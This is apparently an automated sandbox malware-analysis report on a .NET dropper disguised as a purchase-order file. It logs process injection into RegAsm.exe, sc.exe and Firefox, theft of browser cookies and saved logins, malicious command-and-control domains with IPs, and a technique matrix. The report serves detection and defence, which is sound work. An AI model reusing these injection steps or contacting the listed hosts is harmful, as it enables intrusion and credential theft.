                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288656A mov eax, dword ptr fs:[00000030h]1_2_0288656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288656A mov eax, dword ptr fs:[00000030h]1_2_0288656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h]1_2_0285EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h]1_2_0285EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h]1_2_0285EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h]1_2_0285EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h]1_2_0285EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h]1_2_0285EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h]1_2_0285EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h]1_2_0285EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h]1_2_0285EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02924A80 mov eax, dword ptr fs:[00000030h]1_2_02924A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02888A90 mov edx, dword ptr fs:[00000030h]1_2_02888A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02858AA0 mov eax, dword ptr fs:[00000030h]1_2_02858AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02858AA0 mov eax, dword ptr fs:[00000030h]1_2_02858AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028A6AA4 mov eax, dword ptr fs:[00000030h]1_2_028A6AA4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028A6ACC mov eax, dword ptr fs:[00000030h]1_2_028A6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028A6ACC mov eax, dword ptr fs:[00000030h]1_2_028A6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028A6ACC mov eax, dword ptr fs:[00000030h]1_2_028A6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02850AD0 mov eax, dword ptr fs:[00000030h]1_2_02850AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02884AD0 mov eax, dword ptr fs:[00000030h]1_2_02884AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02884AD0 mov eax, dword ptr fs:[00000030h]1_2_02884AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288AAEE mov eax, dword ptr fs:[00000030h]1_2_0288AAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288AAEE mov eax, dword ptr fs:[00000030h]1_2_0288AAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028DCA11 mov eax, dword ptr fs:[00000030h]1_2_028DCA11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287EA2E mov eax, dword ptr fs:[00000030h]1_2_0287EA2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288CA24 mov eax, dword ptr fs:[00000030h]1_2_0288CA24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02874A35 mov eax, dword ptr fs:[00000030h]1_2_02874A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02874A35 mov eax, dword ptr fs:[00000030h]1_2_02874A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02856A50 mov eax, dword ptr fs:[00000030h]1_2_02856A50
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: 0.2.New Order - RCII900718_Contract Drafting.exe.28bfb20.1.raw.unpack, ME.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
                Source: 0.2.New Order - RCII900718_Contract Drafting.exe.28bfb20.1.raw.unpack, ME.cs Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num7, length, 12288, 64)
                Source: 0.2.New Order - RCII900718_Contract Drafting.exe.28bfb20.1.raw.unpack, ME.cs Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num37 + 8, ref buffer, 4, ref bytesWritten)
                Source: 0.2.New Order - RCII900718_Contract Drafting.exe.28bfb20.1.raw.unpack, ME.cs Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num14, payload, bufferSize, ref bytesWritten)
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtTerminateThread: Direct from: 0x76F02FCC
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe NtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe protection: execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: NULL target: C:\Windows\SysWOW64\sc.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\sc.exe Section loaded: NULL target: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe protection: read write
                Source: C:\Windows\SysWOW64\sc.exe Section loaded: NULL target: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\sc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\sc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\sc.exe Thread register set: target process: 984
                Source: C:\Windows\SysWOW64\sc.exe Thread APC queued: target process: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7AD008
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"
                Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: ZrTbKDhAWYKJu.exe, 00000005.00000000.2167638417.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000005.00000002.2978304010.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000000.2307922798.0000000000C40000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: ZrTbKDhAWYKJu.exe, 00000005.00000000.2167638417.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000005.00000002.2978304010.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000000.2307922798.0000000000C40000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: ZrTbKDhAWYKJu.exe, 00000005.00000000.2167638417.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000005.00000002.2978304010.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000000.2307922798.0000000000C40000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: ZrTbKDhAWYKJu.exe, 00000005.00000000.2167638417.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000005.00000002.2978304010.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000000.2307922798.0000000000C40000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Queries volume information: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe VolumeInformation
                Source: C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000006.00000002.2978480170.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.2240548681.00000000025C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.2978393331.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.2241932701.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\sc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000006.00000002.2978480170.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.2240548681.00000000025C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.2978393331.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.2241932701.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: 1 Native API; 1 Service Execution; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: 1 DLL Side-Loading; 1 Windows Service; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 1 Windows Service; 612 Process Injection; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Defense Evasion: 1 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 41 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 41 Virtualization/Sandbox Evasion; 612 Process Injection
                Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: 2 File and Directory Discovery; 113 System Information Discovery; 121 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: 11 Archive Collected Data; 1 Data from Local System; 1 Email Collection; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: 3 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                [Behavior graph] Behavior Graph ID: 1559084, Sample: New Order - RCII900718_Cont..., Startdate: 20/11/2024, Architecture: WINDOWS, Score: 100
                Process chain: New Order - RCII900718_Contract Drafting.exe (started) -> RegAsm.exe (started) -> ZrTbKDhAWYKJu.exe (injected) -> sc.exe (started) -> ZrTbKDhAWYKJu.exe (injected), firefox.exe (started)

                Source | Detection | Scanner | Label | Link
                New Order - RCII900718_Contract Drafting.exe | 32% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                New Order - RCII900718_Contract Drafting.exe | 33% | Virustotal | | Browse
                New Order - RCII900718_Contract Drafting.exe | 100% | Avira | TR/Dropper.MSIL.Gen |
                New Order - RCII900718_Contract Drafting.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                www.avalanchefi.xyz | 0% | Virustotal | | Browse
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                www.avalanchefi.xyz | 13.248.169.48 | true | true | | unknown
                r0lqcud7.nbnnn.xyz | 23.225.159.42 | true | true | | unknown
                jalan2.online | 108.181.189.7 | true | true | | unknown
                bloodbalancecaps.shop | 108.179.253.197 | true | true | | unknown
                www.02760.wang | unknown | unknown | false | | unknown
                www.jalan2.online | unknown | unknown | false | | unknown
                www.laohub10.net | unknown | unknown | false | | unknown
                www.bloodbalancecaps.shop | unknown | unknown | false | | unknown
                                                IP | Domain | Country | ASN | ASN Name | Malicious
                                                13.248.169.48 | www.avalanchefi.xyz | United States | 16509 | AMAZON-02US | true
                                                23.225.159.42 | r0lqcud7.nbnnn.xyz | United States | 40065 | CNSERVERSUS | true
                                                108.179.253.197 | bloodbalancecaps.shop | United States | 46606 | UNIFIEDLAYER-AS-1US | true
                                                108.181.189.7 | jalan2.online | Canada | 852 | ASN852CA | true
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1559084
                                                Start date and time:2024-11-20 07:14:07 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 7m 53s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:8
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:2
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:New Order - RCII900718_Contract Drafting.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@7/2@5/4
                                                EGA Information:
                                                • Successful, ratio: 75%
                                                HCA Information:
                                                • Successful, ratio: 94%
                                                • Number of executed functions: 89
                                                • Number of non-executed functions: 292
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target ZrTbKDhAWYKJu.exe, PID 4208 because it is empty
                                                • Not all processes were analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                Time | Type | Description
                                                01:16:31 | API Interceptor | 372913x Sleep call for process: sc.exe modified
                                                Process:C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe
                                                File Type:CSV text
                                                Category:dropped
                                                Size (bytes):226
                                                Entropy (8bit):5.360398796477698
                                                Encrypted:false
                                                SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                MD5:3A8957C6382192B71471BD14359D0B12
                                                SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                Process:C:\Windows\SysWOW64\sc.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                Category:dropped
                                                Size (bytes):114688
                                                Entropy (8bit):0.9746603542602881
                                                Encrypted:false
                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.49947988354194
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:New Order - RCII900718_Contract Drafting.exe
                                                File size:503'296 bytes
                                                MD5:ab7ce84e9de63dbe7082872755e8a87c
                                                SHA1:cfe36e1ca460e9033dfcda4bbd2a1373feeb22b9
                                                SHA256:bfb840367f7275924d9f1516fc214fbdd64118a5420bdd17a85d2e57ed9cd5b7
